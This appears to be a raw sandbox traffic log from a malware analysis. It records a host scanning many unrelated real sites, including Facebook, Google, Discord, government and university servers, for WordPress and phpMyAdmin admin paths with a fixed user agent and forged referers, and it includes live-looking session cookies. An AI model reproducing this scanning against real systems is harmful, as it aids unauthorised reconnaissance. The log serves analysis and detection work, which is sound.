                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC990INData Raw: 77 20 6e 6f 6f 70 65 6e 65 72 22 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 62 73 5f 6c 5f 69 6d 67 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 62 73 5f 6c 5f 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4d 6f 7a 69 6c 6c 61 20 46 69 72 65 66 6f 78 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 62 73 5f 6c 5f 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 44 6f 77 6e 6c 6f 61 64 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 62 73 5f 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: w noopener"></a> <div class="dbs_l_img"></div> <div class="dbs_l_title"> Mozilla Firefox </div> <div class="dbs_l_info"> Download </div> </div> <div class="dbs_l
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                183192.168.2.66526144.199.96.179443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC233OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://pxndx-mcr.boletia.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC197INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 7358
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                ETag: "5df8f9a3-1cbe"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC7358INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d e2 80 9c 73 74 79 6c 65 73 68 65 65 74 e2 80 9d 20 68 72 65 66 3d e2 80 9c 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 6e 6b 77 33 70 6c 72 2e 63 73 73 e2 80 9c 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 2c 20 2a 3a 62 65 66 6f 72 65 2c 20 2a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Document</title> <link rel=stylesheet href=https://use.typekit.net/nkw3plr.css> <style> *, *:before, *:after { box-sizing: border-box; position: rel


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                184192.168.2.665264162.159.135.232443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC515OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __sdcfduid=f7108151c41711eea0b60fe64c998bd492e66eddc076b200708bdc05ed2cbe73d6bf4f0f17b0d993defd8d35f71a55a6; __dcfduid=f7108150c41711eea0b60fe64c998bd4; __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://discord.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC846INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://discord.com/wp-admin
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qpb5Fv6dmqTXvY70tjwoAFXRQHomYYtPvrtTqzvz3sL9HHs9kZWC7uYotOGf9Nlax037eadL4QImLrL2eVEZtO%2FyCltM%2FId6O5G3P0GhAWMJgQmj3Eb1Hshdh3Yy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd619d9e06ff-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                185192.168.2.66353247.251.24.188443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC171OUTGET /pma HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC731INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 39
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: INGRESSCOOKIE=1707131772.255.15159.541229|f85a63221c8fd9b049d9a82e34821ae3; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                set-cookie: csrfToken=gyl8dbRELIEkZ6gzYC5izLX9; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: lng=en; path=/; expires=Fri, 01 Jan 3030 00:00:00 GMT; domain=.cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                set-cookie: language=en|en; path=/; expires=Fri, 01 Jan 3030 00:00:00 GMT; domain=.cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                Location: /404
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-download-options: noopen
                                                                                                                                                                                                                                                                                                                                                                x-readtime: 12
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC39INData Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 34 30 34 22 3e 2f 34 30 34 3c 2f 61 3e 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Redirecting to <a href="/404">/404</a>.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                186192.168.2.66369631.13.88.1443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: th-th.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC389INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/phpmyadmin/?locale=th_TH&_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: lE7BP/L3VxrQNdtYKijrKH8rwZM1y7Q2yRcDO6vpZijlGezmmxzj6FleeVy+/imQEgR/9gY+I13M1iNlZ94X1w==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                187192.168.2.663343186.113.7.204443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC188OUTGET /phpMyAdmin/ HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: oferta.senasofiaplus.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC911INHTTP/1.1 404 No Encontrado
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1002
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BIGipServerPOOL_SOFIA_OFERTA_PDN_8680=2282888620.59425.0000; path=/; Httponly; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: dcid=1707131771255-34727872; Expires=Sun, 05-May-2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: pvid=1707131771255-71353977; Expires=Mon, 05-Feb-2024 11:21:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: f5avraaaaaaaaaaaaaaaa_session_=MCPBPDIPPPCOMKFPHFDJNDKHMLOJBNAGGGJLKOHELAEOACOEOOPLCKEMKDFMAPDGIOODBMJAADPCCAGJCCDAFABCDMHIHAJNKAHEOOIKOMIPOGONKFHNPLJKOOHONLJH; HttpOnly; secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TS0130ba83=01fd6418ebd276f27ea6b42b055e6f9f9b1801b05962b2a64d91a3ac46f706d6b943a577e220f651cf4dc68b6d6c8f0ec6c74e0d3a9924d15cfaf368b701688f4e193f6d335577fb997eb0c7b89318bf45d25386fd53b31af9461e8acc91f1e912cefb9ef70a4ec00371355a8c5b700470eb4c2548; Path=/; Domain=.oferta.senasofiaplus.edu.co; HTTPOnly
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1002INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 42 6f 73 73 20 57 65 62 2f 37 2e 30 2e 31 30 2e 46 69 6e 61 6c 20 2d 20 49 6e 66 6f 72 6d 65 20 64 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>JBoss Web/7.0.10.Final - Informe de Error</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                188192.168.2.66347531.13.65.1443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC170OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC369INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/pma/?_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: 6ycv/nbmM/Sh7rMEMov496O3T8EdMcZQVczCEh9huscT7IJxXuPw1VE2PZAIt0iIOg+73dbHrQkthyi1iQJFGw==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                189192.168.2.663143201.134.41.61443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC190OUTGET /academico/phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: academico.um.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC451INHTTP/1.1 302
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Location: https://academico.um.edu.mx/academico/login
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=8762699CA49BCC3318B1609C54D1F4A0; Path=/academico; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                190192.168.2.663705177.74.1.157443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sistemas.pa.gov.br
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC164INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                191192.168.2.663116142.250.105.84443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC180OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 61 5f 45 69 41 38 6d 38 4c 46 58 44 6e 53 65 77 70 43 73 52 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ga_EiA8m8LFXDnSewpCsRQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                192192.168.2.66521882.221.28.171443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC170OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: www.uh.is
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC256INHTTP/1.1 404 /phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 988
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=681EEB354EE0F006DFB345B00C6E1B7D; Path=/; Secure
